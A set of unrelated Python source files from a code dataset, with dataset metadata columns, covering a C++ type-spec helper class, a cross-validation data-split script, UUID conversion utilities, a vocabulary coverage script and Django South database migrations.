type_spec(name, value) returns a new object (of this class) that is
used to produce C++ code for value.
declaration_code() returns C++ code fragment for type declaration and
conversion of python object to C++ object.
cleanup_code() returns C++ code fragment for cleaning up after the
variable after main C++ code fragment has executed.
"""
_build_information = []
compiler = ''
def set_compiler(self,compiler):
self.compiler = compiler
def type_match(self,value):
raise NotImplementedError("You must override method in derived class")
def build_information(self):
return self._build_information
def type_spec(self,name,value):
pass
def declaration_code(self,templatize = 0):
return ""
def local_dict_code(self):
return ""
def cleanup_code(self):
return ""
def retrieve_py_variable(self,inline=0):
# this needs a little coordination in name choices with the
# ext_inline_function class.
if inline:
vn = 'get_variable("%s",raw_locals,raw_globals)' % self.name
else:
vn = 'py_' + self.name
return vn
def py_reference(self):
return "&py_" + self.name
def py_pointer(self):
return "*py_" + self.name
def py_variable(self):
return "py_" + self.name
def reference(self):
return "&" + self.name
def pointer(self):
return "*" + self.name
def init_flag(self):
return self.name + "_used"
def variable(self):
return self.name
def variable_as_string(self):
return '"' + self.name + '"'
import UserList
import base_info
class arg_spec_list(UserList.UserList):
def build_information(self):
all_info = base_info.info_list()
for i in self:
all_info.extend(i.build_information())
return all_info
def py_references(self):
return map(lambda x: x.py_reference(),self)
def py_pointers(self):
return map(lambda x: x.py_pointer(),self)
def py_variables(self):
return map(lambda x: x.py_variable(),self)
def references(self):
return map(lambda x: x.reference(),self)
def pointers(self):
return map(lambda x: x.pointer(),self)
def variables(self):
return map(lambda x: x.variable(),self)
def init_flags(self):
return map(lambda x: x.init_flag(),self)
def variable_as_strings(self):
return map(lambda x: x.variable_as_string(),self)
| en | 0.778711 | Properties: headers -- list of strings that name the header files needed by this object. include_dirs -- list of directories where the header files can be found. libraries -- list of libraries needed to link to when compiling extension. library_dirs -- list of directories to search for libraries. support_code -- list of strings. Each string is a subroutine needed by the type. Functions that are used in the conversion between Python and C++ files are examples of these. Methods: type_match(value) returns 1 if this class is used to represent type specification for value. type_spec(name, value) returns a new object (of this class) that is used to produce C++ code for value. declaration_code() returns C++ code fragment for type declaration and conversion of python object to C++ object. cleanup_code() returns C++ code fragment for cleaning up after the variable after main C++ code fragment has executed. # this needs a little coordination in name choices with the # ext_inline_function class. | 2.922301 | 3 |
xception/test.py | latentai/model-zoo-models | 8 | 8556 | <filename>xception/test.py
#!/usr/bin/env python3
from utils.model_config_helpers import run_model_test
run_model_test()
| <filename>xception/test.py
#!/usr/bin/env python3
from utils.model_config_helpers import run_model_test
run_model_test()
| fr | 0.221828 | #!/usr/bin/env python3 | 1.35047 | 1 |
mpunet/bin/cv_split.py | alexsosn/MultiPlanarUNet | 0 | 8557 | <filename>mpunet/bin/cv_split.py
from glob import glob
import sys
import os
import numpy as np
import random
from mpunet.utils import create_folders
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Prepare a data folder for a"
"CV experiment setup.")
parser.add_argument("--data_dir", type=str,
help="Path to data directory")
parser.add_argument("--CV", type=int, default=5,
help="Number of splits (default=5)")
parser.add_argument("--out_dir", type=str, default="views",
help="Directory to store CV subfolders "
"(default=views")
parser.add_argument("--im_sub_dir", type=str, default="images",
help="Subfolder under 'data_dir' in which image are "
"stored (default=images)")
parser.add_argument("--lab_sub_dir", type=str, default="labels",
help="Subfolder under 'data_dir' in which labels are "
"stored (default=labels)")
parser.add_argument("--copy", action="store_true",
help="Copy files to CV-subfolders instead of "
"symlinking (not recommended)")
parser.add_argument("--file_list", action="store_true",
help="Create text files with paths pointing to the "
"images at the image and labels subdirs under "
"each split instead of symlink/copying. This is"
" usefull on systems were symlink is not "
"supported, but the dataset size is too large to"
" store in copies. NOTE: Only one of --copy and "
"--file_list flags must be set.")
parser.add_argument("--file_regex", type=str, default="*.nii*",
help="Regex used to select files from the image "
"and labels subdirs. (default='*.nii*')")
parser.add_argument("--validation_fraction", type=float, default=0.20,
help="Fraction of OVERALL data size used for "
"validation in each split. In a 5-CV setting with "
"N=100 and val_frac=0.20, each split will have "
"N_train=60, N_val=20 and N_test=20 images")
parser.add_argument("--test_fraction", type=float, default=0.20,
help="Fraction of data size used for test if CV=1.")
parser.add_argument("--common_prefix_length", type=int, required=False, default=0)
return parser
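# Example arguments (paths and values are hypothetical), as parsed by
# entry_func() below:
#   --data_dir ./my_dataset --CV 5 --validation_fraction 0.20
# This produces ./my_dataset/views/5_CV/split_0 ... split_4, each holding
# train/val/test sub-folders with symlinked images and labels.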
def assert_dir_structure(data_dir, im_dir, lab_dir, out_dir):
for _dir in (data_dir, im_dir, lab_dir):
if not os.path.exists(_dir):
raise OSError("Invalid data directory '%s'. Does not exist." % data_dir)
if os.path.exists(out_dir):
raise OSError("Output directory at '%s' already exists." % out_dir)
def create_view_folders(out_dir, n_splits):
if not os.path.exists(out_dir):
print("Creating directory at %s" % out_dir)
os.makedirs(out_dir)
if n_splits > 1:
for i in range(n_splits):
split_dir = os.path.join(out_dir, "split_%i" % i)
print("Creating directory at %s" % split_dir)
os.mkdir(split_dir)
def pair_by_names(images, common_prefix_length):
if common_prefix_length == 0:
return images
from collections import defaultdict
names = [os.path.split(i)[-1][:common_prefix_length] for i in images]
inds = defaultdict(list)
for i, item in enumerate(names):
inds[item].append(i)
pairs = inds.values()
return [tuple(np.array(images)[i]) for i in pairs]
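# Example (file names are made up): with common_prefix_length=7, the images
# "sub-001_T1.nii.gz" and "sub-001_T2.nii.gz" share the prefix "sub-001" and
# are therefore returned together as a single tuple, so they always end up in
# the same train/val/test split.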
def add_images(images, im_folder_path, label_folder_path, im_dir, lab_dir,
link_func=os.symlink):
for image in images:
if not isinstance(image, (list, tuple, np.ndarray)):
image = (image,)
for im in image:
# Get file name
file_name = os.path.split(im)[-1]
# Get label path (OBS: filenames must match!)
lab = im.replace(im_dir, lab_dir)
if not os.path.exists(lab):
raise OSError("No label file found at '%s'. OBS: image and "
"label files must have exactly the same name. "
"Images should be located at '%s' and labels at"
" '%s'" % (lab, im_folder_path, label_folder_path))
# Get relative paths
rel_image = os.path.relpath(im, im_folder_path)
rel_label = os.path.relpath(lab, label_folder_path)
# Symlink or copy
link_func(rel_image, im_folder_path + "/%s" % file_name)
link_func(rel_label, label_folder_path + "/%s" % file_name)
def _add_to_file_list_fallback(rel_image_path, image_path,
fname="LIST_OF_FILES.txt"):
"""
On some systems symlinks are not supported. If the --file_list flag is set,
this function is used instead to append each absolute file path to a list
file in the final subfolder that would otherwise store the image and label
links or copies. At run-time, the files must then be loaded by reading the
paths from these list files.
"""
# Get folder where list of files should be stored
folder = os.path.split(image_path)[0]
# Get absolute path to image
# We change dir to get the correct abs path from the relative
os.chdir(folder)
abs_file_path = os.path.abspath(rel_image_path)
# Get path to the list of files
list_file_path = os.path.join(folder, fname)
with open(list_file_path, "a") as out_f:
out_f.write(abs_file_path + "\n")
def entry_func(args=None):
# Get parser
parser = vars(get_parser().parse_args(args))
# Get arguments
data_dir = os.path.abspath(parser["data_dir"])
n_splits = int(parser["CV"])
if n_splits > 1:
out_dir = os.path.join(data_dir, parser["out_dir"], "%i_CV" % n_splits)
else:
out_dir = os.path.join(data_dir, parser["out_dir"], "fixed_split")
im_dir = os.path.join(data_dir, parser["im_sub_dir"])
lab_dir = os.path.join(data_dir, parser["lab_sub_dir"])
copy = parser["copy"]
file_list = parser["file_list"]
regex = parser["file_regex"]
val_frac = parser["validation_fraction"]
test_frac = parser["test_fraction"]
common_prefix_length = parser["common_prefix_length"]
if n_splits == 1 and not test_frac:
raise ValueError("Must specify --test_fraction with --CV=1.")
if copy and file_list:
raise ValueError("Only one of --copy and --file_list "
"flags must be set.")
# Assert suitable folders
assert_dir_structure(data_dir, im_dir, lab_dir, out_dir)
# Create sub-folders
create_view_folders(out_dir, n_splits)
# Get images and pair by subject identifier if common_prefix_length > 0
images = glob(os.path.join(im_dir, regex))
images = pair_by_names(images, common_prefix_length)
print("-----")
print("Found {} images".format(len(images)))
# Get validation size
N_total = len(images)
if n_splits > 1:
N_test = N_total // n_splits
else:
N_test = int(np.ceil(N_total * test_frac))
N_val = int(np.ceil(N_total * val_frac))
if N_val + N_test >= N_total:
raise ValueError("Too large validation_fraction - "
"No training samples left!")
N_train = N_total - N_test - N_val
print("Total images:".ljust(40), N_total)
print("Train images pr. split:".ljust(40), N_train)
print("Validation images pr. split:".ljust(40), N_val)
print("Test images pr. split:".ljust(40), N_test)
# Shuffle and split the images into CV parts
random.shuffle(images)
splits = np.array_split(images, n_splits)
# Symlink / copy files
for i, split in enumerate(splits):
print(" Split %i/%i" % (i+1, n_splits), end="\r", flush=True)
# Set root path to split folder
if n_splits > 1:
split_path = os.path.join(out_dir, "split_%i" % i)
else:
split_path = out_dir
        if n_splits == 1:
            # Here we somewhat hackily force the following code to work with
            # CV=1: define a test set and overwrite the current split (which
            # stores all the data, as splits was never split with n_splits=1)
            split = splits[0][:N_test]
            # Overwrite the splits variable with a length-2 list holding the
            # remaining data, which will be used as val+train. The loop still
            # refers to the old splits and thus only executes once.
            splits = [split, splits[0][N_test:]]
# Define train, val and test sub-dirs
train_path = os.path.join(split_path, "train")
train_im_path = os.path.join(train_path, parser["im_sub_dir"])
train_label_path = os.path.join(train_path, parser["lab_sub_dir"])
if N_val:
val_path = os.path.join(split_path, "val")
val_im_path = os.path.join(val_path, parser["im_sub_dir"])
val_label_path = os.path.join(val_path, parser["lab_sub_dir"])
else:
val_path, val_im_path, val_label_path = (None,) * 3
test_path = os.path.join(split_path, "test")
test_im_path = os.path.join(test_path, parser["im_sub_dir"])
test_label_path = os.path.join(test_path, parser["lab_sub_dir"])
# Create folders if not existing
create_folders([train_path, val_path, train_im_path, train_label_path,
val_im_path, val_label_path, test_path, test_im_path,
test_label_path])
# Copy or symlink?
if copy:
from shutil import copyfile
move_func = copyfile
elif file_list:
move_func = _add_to_file_list_fallback
else:
move_func = os.symlink
# Add test data to test folder
add_images(split, test_im_path, test_label_path, im_dir, lab_dir, move_func)
# Join remaining splits into train+val
remaining = [x for ind, x in enumerate(splits) if ind != i]
remaining = [item for sublist in remaining for item in sublist]
# Extract validation data from the remaining
random.shuffle(remaining)
validation = remaining[:N_val]
training = remaining[N_val:]
# Add
if validation:
add_images(validation, val_im_path, val_label_path, im_dir, lab_dir, move_func)
add_images(training, train_im_path, train_label_path, im_dir, lab_dir, move_func)
if __name__ == "__main__":
entry_func()
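# Example invocation (paths are hypothetical; the flags are the ones defined
# in get_parser() earlier in this file):
#   python cv_split.py --data_dir /data/my_dataset --CV 5 \
#       --im_sub_dir images --lab_sub_dir labels --validation_fraction 0.20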
| en | 0.833502 | # Get file name # Get label path (OBS: filenames must match!) # Get relative paths # Symlink or copy On some system synlinks are not supported, if --files_list flag is set, uses this function to add each absolute file path to a list at the final subfolder that is supposed to store images and label links or actual files At run-time, these files must be loaded by reading in the path from these files instead. # Get folder where list of files should be stored # Get absolute path to image # We change dir to get the correct abs path from the relative # Get path to the list of files # Get parser # Get arguments # Assert suitable folders # Create sub-folders # Get images and pair by subject identifier if common_prefix_length > 0 # Get validation size # Shuffle and split the images into CV parts # Symlink / copy files # Set root path to split folder # Here we kind of hacky force the following code to work with CV=1 # Define a test set and overwrite the current split (which stores # add the data, as splits was never split with n_splits=1 # Overwrite the splits variable to a length 2 array with the # remaining data which will be used as val+train. The loop still # refers to the old split and thus will only execute once # Define train, val and test sub-dirs # Create folders if not existing # Copy or symlink? # Add test data to test folder # Join remaining splits into train+val # Extract validation data from the remaining # Add | 2.946126 | 3 |
src/client/pydaos/raw/conversion.py | gczsjdy/daos | 1 | 8558 | #!/usr/bin/python
"""
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import ctypes
import uuid
def c_uuid_to_str(uuid):
""" utility function to convert a C uuid into a standard string format """
uuid_str = '{:02X}{:02X}{:02X}{:02X}-{:02X}{:02X}-{:02X}{:02X}-{:02X}'\
'{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X}'.format(
uuid[0], uuid[1], uuid[2], uuid[3], uuid[4], uuid[5],
uuid[6], uuid[7], uuid[8], uuid[9], uuid[10], uuid[11],
uuid[12], uuid[13], uuid[14], uuid[15])
return uuid_str
def c_uuid(p_uuid, c_uuid):
""" utility function to create a UUID in C format from a python UUID """
hexstr = p_uuid.hex
for i in range(0, 31, 2):
c_uuid[int(i/2)] = int(hexstr[i:i+2], 16)
def str_to_c_uuid(uuidstr):
""" utility function to convert string format uuid to a C uuid """
uuidstr2 = '{' + uuidstr + '}'
puuid = uuid.UUID(uuidstr2)
cuuid = (ctypes.c_ubyte * 16)()
c_uuid(puuid, cuuid)
return cuuid
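# Minimal round-trip sketch using only the helpers and imports defined above
# (illustrative, not part of the original module):
#   py_uuid = uuid.uuid4()
#   buf = (ctypes.c_ubyte * 16)()
#   c_uuid(py_uuid, buf)
#   assert c_uuid_to_str(buf).lower() == str(py_uuid)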
| en | 0.828556 | #!/usr/bin/python (C) Copyright 2018 Intel Corporation. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE The Government's rights to use, modify, reproduce, release, perform, display, or disclose this software are subject to the terms of the Apache License as provided in Contract No. B609815. Any reproduction of computer software, computer software documentation, or portions thereof marked with this legend must also reproduce the markings. utility function to convert a C uuid into a standard string format utility function to create a UUID in C format from a python UUID utility function to convert string format uuid to a C uuid | 2.770958 | 3 |
experiments/nmt/utils/vocabulary_coverage.py | lvapeab/GroundHog_INMT | 0 | 8559 | import cPickle
import argparse
parser = argparse.ArgumentParser(
"Computes the coverage of a shortlist in a corpus file")
parser.add_argument("--vocab",
required=True, help="Vocabulary to use (.pkl)")
parser.add_argument("--text",
required=True, help="Beam size, turns on beam-search")
args = parser.parse_args()
with open(args.vocab, 'rb') as f:
d = cPickle.load(f)
with open(args.text, 'rb') as f:
text = f.read().splitlines()
n_words = 0
n_unks = 0
split_vocab = 0
split_vocabulary = {}
for line in text:
for word in line.split():
if split_vocabulary.get(word) is None:
split_vocabulary[word] = split_vocab
split_vocab += 1
if d.get(word) is None:
n_unks += 1
n_words += 1
print "Coverage: %f (%d unknown words out of %d of a total of %d)"%((float)(split_vocab - n_unks)/split_vocab, n_unks, split_vocab, n_words)
| none | 1 | 2.947798 | 3 |
|
stores/apps/inventory/migrations/0001_initial.py | diassor/CollectorCity-Market-Place | 135 | 8560 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
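# Typical way to apply this initial migration with South (standard South
# commands, assumed rather than taken from this project's own docs):
#   python manage.py syncdb --noinput
#   python manage.py migrate inventory 0001_initial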
| en | 0.654754 | # encoding: utf-8 # Adding model 'ProductType' # Adding model 'Product' # Adding model 'Coin' # Deleting model 'ProductType' # Deleting model 'Product' # Deleting model 'Coin' | 2.163169 | 2 |
src/ralph/deployment/migrations/0005_auto__add_field_archiveddeployment_service__add_field_archiveddeployme.py | vi4m/ralph | 1 | 8561 | <reponame>vi4m/ralph
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ArchivedDeployment.service'
db.add_column('deployment_archiveddeployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'ArchivedDeployment.device_environment'
db.add_column('deployment_archiveddeployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.service'
db.add_column('deployment_deployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.device_environment'
db.add_column('deployment_deployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
def backwards(self, orm):
# Deleting field 'ArchivedDeployment.service'
db.delete_column('deployment_archiveddeployment', 'service_id')
# Deleting field 'ArchivedDeployment.device_environment'
db.delete_column('deployment_archiveddeployment', 'device_environment_id')
# Deleting field 'Deployment.service'
db.delete_column('deployment_deployment', 'service_id')
# Deleting field 'Deployment.device_environment'
db.delete_column('deployment_deployment', 'device_environment_id')
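    # For reference only: a rough sketch of the equivalent field addition in a
    # modern (post-South) Django migration; this is an assumption for
    # illustration, not part of this South migration.
    #   migrations.AddField(
    #       model_name='deployment',
    #       name='service',
    #       field=models.ForeignKey('cmdb.CI', null=True,
    #                               on_delete=models.SET_NULL),
    #   )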
models = {
'account.profile': {
'Meta': {'object_name': 'Profile'},
'activation_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'birth_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'cost_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'country': ('django.db.models.fields.PositiveIntegerField', [], {'default': '153'}),
'department': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'employee_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'gender': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'home_page': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '1', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'manager': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'nick': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '30', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
